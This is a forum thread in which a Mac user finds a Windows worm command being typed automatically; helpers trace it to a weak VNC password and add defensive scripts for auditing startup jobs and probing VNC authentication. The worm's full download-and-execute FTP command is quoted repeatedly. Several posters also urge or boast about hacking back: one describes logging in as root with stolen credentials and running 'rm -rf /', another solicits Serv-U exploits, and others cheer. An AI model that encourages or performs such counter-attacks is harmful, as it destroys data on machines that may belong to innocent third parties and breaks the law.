
vd0t (macrumors regular, Original poster), Jun 7, 2005:
I think I may have a worm on my Mac! Since a few days ago, I noticed that every few hours, the following message is typed automatically:

cmd /c net stop sharedaccess 7echo open elterryer.serveftp.net 21 .. ij 7echo user a b .. ij 7echo binary .. ij 7echo get update.exe .. ij 7echo bye .. ij 7ftp -n -v -s;ij 7del ij 7update.exe 7net start sharedaccess 7exit

I don't think it will do any damage as it looks like it's meant for Windows (look at update.exe). But I'm puzzled as to how it got onto or runs on my Mac!

How do I get rid of this?

Thanks!
 
Typed where? How did you get it? What programs are affected?

More info needed before the people with torches and pitchforks start their riots :p
 
I think I may have a worm on my Mac! Since a few days ago, I noticed that every few hours, the following message is typed automatically:

cmd /c net stop sharedaccess 7echo open elterryer.serveftp.net 21 .. ij 7echo user a b .. ij 7echo binary .. ij 7echo get update.exe .. ij 7echo bye .. ij 7ftp -n -v -s;ij 7del ij 7update.exe 7net start sharedaccess 7exit

I don't think it will do any damage as it looks like it's meant for Windows (look at update.exe). But I'm puzzled as to how it got onto or runs on my Mac!

How do I get rid of this?

Thanks!
Check your Login Items (located under System Preferences -> Accounts) for anything strange running at startup. Also check your cron tables (an application like Cronnix makes this task much easier) and your launchd settings (use Lingon for this purpose) for anything set to automatically launch that you don't want launched.
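The cron and launchd checks in this post can be scripted. The block below is an added example, not code from any poster in the thread or from Cronnix or Lingon: it reads the launchd property lists from the standard directories, parses the user's crontab, and flags the traits a practitioner reads first (a job that re-fires on a timer, an executable living in /tmp, a download tool as the program). The directory list, the heuristics and the constructed sample job are assumptions of the example, and it does not read the Login Items list, which still needs the Accounts pane described above.

```python
"""Audit macOS auto-start locations (launchd jobs, crontab) for entries you did not create.
Added example for this thread; not code from any poster, Cronnix or Lingon.
Assumes the standard launchd directories and a `crontab` binary; anything
missing (e.g. on Linux) is skipped rather than treated as an error."""
import os, plistlib, subprocess, tempfile
from pathlib import Path

LAUNCHD_DIRS = ["/Library/LaunchAgents", "/Library/LaunchDaemons",
                os.path.expanduser("~/Library/LaunchAgents")]
# Heuristics chosen for this example (an assumption, not a rule): jobs run from a
# world-writable directory, using a download tool, or re-firing on a timer come first.
SUSPECT_PATH_PREFIXES = ("/tmp/", "/var/tmp/", "/private/tmp/", "/Users/Shared/")
SUSPECT_TOOLS = {"curl", "wget", "ftp", "nc", "ncat", "osascript"}


def load_job(plist_path):
    """Read one launchd property list into a flat dict."""
    with open(plist_path, "rb") as fh:
        data = plistlib.load(fh)
    args = list(data.get("ProgramArguments") or [])
    if not args and data.get("Program"):
        args = [data["Program"]]
    return {"file": str(plist_path), "label": data.get("Label", "<no Label>"), "args": args,
            "run_at_load": bool(data.get("RunAtLoad", False)),
            "keep_alive": bool(data.get("KeepAlive", False)),
            "interval": data.get("StartInterval")}


def indicators(job):
    """Reasons a job deserves a look; an empty list means nothing stood out."""
    if not job["args"]:
        return ["no program to run"]
    exe, flags = job["args"][0], []
    if exe.startswith(SUSPECT_PATH_PREFIXES):
        flags.append("executable lives in a temp or shared directory")
    if os.path.basename(exe) in SUSPECT_TOOLS:
        flags.append(f"executable is a download/scripting tool ({os.path.basename(exe)})")
    if job["interval"] is not None:
        flags.append(f"re-runs every {job['interval']} seconds")
    if job["run_at_load"] or job["keep_alive"]:
        flags.append("restarts at login/boot or whenever it dies")
    return flags


def scan_dir(directory):
    """Load every *.plist in a launchd directory; a malformed file is reported, not skipped."""
    directory = Path(directory)
    if not directory.is_dir():
        return []
    jobs = []
    for plist in sorted(directory.glob("*.plist")):
        try:
            jobs.append(load_job(plist))
        except Exception as exc:
            jobs.append({"file": str(plist), "label": f"<unreadable: {exc}>", "args": [],
                         "run_at_load": False, "keep_alive": False, "interval": None})
    return jobs


def parse_crontab(text):
    """Turn `crontab -l` output into (schedule, command) pairs; comments and VAR=value lines are dropped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                      # @reboot, @hourly, ...
            sched, _, cmd = line.partition(" ")
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:                       # not a job line
                continue
            sched, cmd = " ".join(fields[:5]), fields[5]
        entries.append((sched, cmd.strip()))
    return entries


def make_sample_dir():
    """Constructed sample: a job that re-runs /tmp/update every two hours (not a real artefact)."""
    directory = tempfile.mkdtemp(prefix="launchd-sample-")
    job = {"Label": "com.example.updater", "ProgramArguments": ["/tmp/update", "-q"],
           "StartInterval": 7200, "RunAtLoad": True}
    with open(os.path.join(directory, "com.example.updater.plist"), "wb") as fh:
        plistlib.dump(job, fh)
    return directory


if __name__ == "__main__":
    for d in LAUNCHD_DIRS + [make_sample_dir()]:
        for job in scan_dir(d):
            print(f"{job['label']:<40} {' '.join(job['args'])}")
            for flag in indicators(job):
                print(f"    ! {flag}")
    try:   # a missing or empty crontab yields no lines rather than an error
        cron_text = subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout
    except FileNotFoundError:
        cron_text = ""
    for sched, cmd in parse_crontab(cron_text):
        print(f"cron {sched:<20} {cmd}")
```

Run it as the user whose session is affected; the constructed com.example.updater job shows what a flagged entry looks like, and a real job that fires "every few hours" would appear the same way with a StartInterval or a cron schedule.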
 
...echo open elterryer.serveftp.net...

abuse@dyndns.com

Some idiot's trying to do Windows-y stuff on your Mac. I suggest you mail whatever you're getting those from to the above email address.

On the flip side, if you feel like being particularly evil...if you can ftp to that address and muck around with things...DO IT! :D

I once had some idiot noob h4x0r try to ssh from a user with like zero privileges on my Mac where the password was "password"...he couldn't get anything working, the idiot left a huge ton of addresses and passwords in the command history while he tried to use ssh/wget/curl/links to figure out some way to do something. I ssh'd into one of those from a different computer logged in as root and deleted everything. Like rm -rf / kind of everything. Eventually the connection was reset, probably because the computer restarted :D
 
It's typed anywhere! So if I have TextEdit open, it will type it there. If the cursor is on a file, it will rename that file. If I'm watching a movie in QuickTime, it will attempt to type (I hear the keyboard beep sound).

I looked through my login items and don't see anything suspicious.
 
abuse@dyndns.com

Some idiot's trying to do Windows-y stuff on your Mac. I suggest you mail whatever you're getting those from to the above email address.

On the flip side, if you feel like being particularly evil...if you can ftp to that address and muck around with things...DO IT! :D

I once had some idiot noob h4x0r try to ssh from a user with like zero privileges on my Mac where the password was "password"...he couldn't get anything working, the idiot left a huge ton of addresses and passwords in the command history while he tried to use ssh/wget/curl/links to figure out some way to do something. I ssh'd into one of those from a different computer logged in as root and deleted everything. Like rm -rf / kind of everything. Eventually the connection was reset, probably because the computer restarted :D


That is just so beautiful....:)
 
That is just so beautiful....:)
Although I was being stupid about the easy-to-guess password (it was a throwaway account for testing), the guy was stupider for leaving behind so many passwords and sshing as root. I would have seen it eventually, but the first thing that tipped me off was Little Snitch blocking all sorts of stuff that only I'd usually be using. The guy even tried to use wget to download a copy of openssh to use..well, Little Snitch would block that too :D

I just sat around watching what he was doing until he stopped..then I deleted stuff. It was the funniest thing ever.
 
The hostname resolves to 72.244.39.101, which is registered to an ISP named Covad Communications in San Jose, California.

E-mail address to report abuse is abuse-isp@covad.com

Unfortunately this particular user does not have Telnet or SSH running, but the FTP software identifies itself as "Serv-U FTP-Server v2.5e for WinSock" if anyone knows any exploits :)
 
...
I once had some idiot noob h4x0r try to ssh from a user with like zero privileges on my Mac where the password was "password"...he couldn't get anything working, the idiot left a huge ton of addresses and passwords in the command history while he tried to use ssh/wget/curl/links to figure out some way to do something. I ssh'd into one of those from a different computer logged in as root and deleted everything. Like rm -rf / kind of everything. Eventually the connection was reset, probably because the computer restarted.

I like your style. :D That. is. brilliant.
 
I don't see anything suspicious in Activity Monitor.

I have Parallels installed with Windows XP (never had any problems in the past). And I installed Vine Server (VNC server) recently so I can access my Mac from my Windows PC. I'm thinking this may be the culprit. But it still doesn't really make sense to me.

I have to leave for work and look more into this when I get home.
 
abuse@dyndns.com

Some idiot's trying to do Windows-y stuff on your Mac. I suggest you mail whatever you're getting those from to the above email address.

On the flip side, if you feel like being particularly evil...if you can ftp to that address and muck around with things...DO IT! :D

I once had some idiot noob h4x0r try to ssh from a user with like zero privileges on my Mac where the password was "password"...he couldn't get anything working, the idiot left a huge ton of addresses and passwords in the command history while he tried to use ssh/wget/curl/links to figure out some way to do something. I ssh'd into one of those from a different computer logged in as root and deleted everything. Like rm -rf / kind of everything. Eventually the connection was reset, probably because the computer restarted :D

THAT IS ABSOLUTELY BEAUTIFUL!

Nice job backhacking.... as long as you toasted the hacker's machine, rather than someone's 0wned box that he was using as a gateway.

I don't see anything suspicious in Activity Monitor.

I have Parallels installed with Windows XP (never had any problems in the past). And I installed Vine Server (VNC server) recently so I can access my Mac from my Windows PC. I'm thinking this may be the culprit. But it still doesn't really make sense to me.

I have to leave for work and look more into this when I get home.

VNC is the attack vector. Do you have a password set for it? Good lord, plug that hole before he realizes that you're running a *NIX and starts using the appropriate commands!
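One way to answer "do you have a password set for it?" from the outside is to look at what the server itself advertises. The block below is an added example, not code from the thread or from Vine Server: it performs only the RFB version and security-type handshake and reports whether the server offers security type 1 (None), which is what a VNC server that requires no password announces; it never proceeds past that step. The mock server, host and port values are constructed so the check runs offline; point probe_vnc at your own machine's VNC port to check the real server.

```python
"""Check whether a VNC (RFB) server demands authentication.
Added example for this thread; not code from any poster or from Vine Server.
Speaks only the RFB version and security-type handshake, then disconnects.
The mock server is constructed so the check can be exercised offline."""
import socket
import struct
import threading

# Security types from the RFB specification; 1 means the server lets anyone in.
SECURITY_TYPES = {1: "None (no password)", 2: "VNC Authentication",
                  16: "Tight", 18: "TLS", 19: "VeNCrypt"}
VNC_NONE = 1


def _recv_exact(sock, n):
    """Read exactly n bytes or raise; RFB fields are fixed-size, so short reads are errors."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-handshake")
        buf += chunk
    return buf


def probe_vnc(host, port=5900, timeout=3.0):
    """Return the list of security types the server offers, e.g. [1] means no password needed."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        banner = _recv_exact(sock, 12)                 # e.g. b"RFB 003.008\n"
        if not banner.startswith(b"RFB "):
            raise ValueError(f"not an RFB server: {banner!r}")
        major, minor = int(banner[4:7].decode()), int(banner[8:11].decode())
        sock.sendall(banner)                           # accept the server's version
        if (major, minor) < (3, 7):
            # RFB 3.3: the server dictates a single 32-bit security type
            (sec_type,) = struct.unpack(">I", _recv_exact(sock, 4))
            return [sec_type]
        count = _recv_exact(sock, 1)[0]
        if count == 0:                                 # refused; a reason string follows
            (reason_len,) = struct.unpack(">I", _recv_exact(sock, 4))
            raise ConnectionError(_recv_exact(sock, reason_len).decode(errors="replace"))
        return list(_recv_exact(sock, count))


def describe(types):
    """Human-readable verdict for a list of offered security types."""
    names = [SECURITY_TYPES.get(t, f"type {t}") for t in types]
    verdict = "OPEN: no password required" if VNC_NONE in types else "password/auth required"
    return f"{verdict} (offered: {', '.join(names)})"


class MockRfbServer:
    """Constructed RFB 3.8 server that performs the handshake once and then hangs up."""

    def __init__(self, security_types):
        self.types = bytes(security_types)
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))               # loopback only, ephemeral port
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        conn, _ = self.sock.accept()
        with conn:
            conn.sendall(b"RFB 003.008\n")
            _recv_exact(conn, 12)                      # client's version reply
            conn.sendall(bytes([len(self.types)]) + self.types)
        self.sock.close()


def check_mock(security_types):
    """Start a mock server offering `security_types` and return what the probe sees."""
    server = MockRfbServer(security_types)
    return probe_vnc("127.0.0.1", server.port)


if __name__ == "__main__":
    for offered in ([VNC_NONE], [2], [VNC_NONE, 2]):
        print(describe(check_mock(offered)))
```

A server that offers type 1 alongside others still lets a client pick 1, so the verdict treats any appearance of None as open; after enabling a password in Vine Server, the same probe against localhost should no longer list it.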
 
I changed the password to my VNC server. It seems like everything is ok now.
 
abuse@dyndns.com

Some idiot's trying to do Windows-y stuff on your Mac. I suggest you mail whatever you're getting those from to the above email address.

On the flip side, if you feel like being particularly evil...if you can ftp to that address and muck around with things...DO IT! :D

I once had some idiot noob h4x0r try to ssh from a user with like zero privileges on my Mac where the password was "password"...he couldn't get anything working, the idiot left a huge ton of addresses and passwords in the command history while he tried to use ssh/wget/curl/links to figure out some way to do something. I ssh'd into one of those from a different computer logged in as root and deleted everything. Like rm -rf / kind of everything. Eventually the connection was reset, probably because the computer restarted :D

That really is precious :D
 
I changed the password to my VNC server. It seems like everything is ok now.

If your password for VNC was the same for any other services you use, I would strongly advise changing them as well. STRONGLY.
 
I like your style. :D That. is. brilliant.
That really is precious :D
THAT IS ABSOLUTELY BEAUTIFUL!

Nice job backhacking.... as long as you toasted the hacker's machine, rather than someone's 0wned box that he was using as a gateway.

:D

It wasn't really backhacking...and there wasn't anything in terms of actual user data that I could see except suspicious looking files, some of which the idiot was trying to get onto my box.
 
I originally chose a short password, which I've used in the past with no problems. But now I've changed it to something stronger. Lesson learned! Thanks all!
 